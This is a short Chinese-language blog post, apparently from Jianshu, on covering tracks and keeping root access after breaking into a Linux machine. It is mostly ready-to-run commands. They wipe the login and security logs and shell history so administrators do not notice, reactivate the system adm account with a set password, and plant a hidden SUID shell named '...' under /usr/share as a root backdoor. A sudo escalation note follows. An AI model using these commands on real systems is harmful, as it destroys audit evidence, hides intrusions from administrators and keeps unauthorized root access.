linux清理入侵日志和维持权限

清除日志

1、清除登录ssh登录日志、安全日志、last、lastb等

cat /dev/null > /var/log/wtmp
cat /dev/null > /var/log/btmp
cat /dev/null > /var/log/lastlog
cat /dev/null > /var/log/secure

2、history删除

set +o history (最前面有空格)

输入该命令后,在当前终端,之后输入的所有命令都不会被history记录(防止搞到一半被管理员断网,记录留下)

history -c

输入该命令之后,当前终端所有输过的命令不会被记录到history(一般这>个就够了)

rm -rf ~/.bash_history

删除history,意思之前管理员记录的history也没了,有的管理员有查看history的习惯,这条慎用

linux suid提权

前提:以root权限激活用户,并创建suid提权的后门
激活adm用户(linux自带很多无用用户,如adm)
usermod -s /bin/bash adm
echo "password"|passwd --stdin adm
suid提权,把sh复制重命名为...,放在其他文件夹,加s权限,重命名为...是为了不被发现,ls看不到,ls -la一般人也看不出
cp /bin/sh /usr/share/...
chmod a+s /usr/share/...
使用时以adm ssh登录,然后输入以下命令就是root权限了
./usr/share/... -p
经测试3.10.0可以完全root权限,有些版本权限会有问题

linux sudo提权

前提:linux /etc/sudoers文件有添加你普通用户的账号


在以普通用户test执行sudo bash
输入test用户的密码
同理sudo vim sudo sh也是可以的

©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • mean to add the formatted="false" attribute?.[ 46% 47325/...
    ProZoom阅读 2,747评论 0 3
  • 进入带空格的文件或者文件夹 Linux文件权限详解 文件和目录权限概述 在linux中的每一个文件或目录都包含有访...
    annkee阅读 2,732评论 0 4
  • 本文笔记源自这里——[实验楼]欢迎大家在下面交流其中有问题的地方喜欢请点收藏,每日更新(全部已亲自实践). 一. ...
    东皇Amrzs阅读 4,127评论 7 54
  • 1.命令格式:ifconfig [网络设备] [参数] 2.命令功能: ifconfig 命令用来查看和配置网络设...
    Nuuuu阅读 3,902评论 0 12
  • 黑米猪竟然跟小区里面小孩打羽毛球 以后要生个小孩让黑米猪陪他打羽毛球 哼
    安之SY阅读 140评论 0 0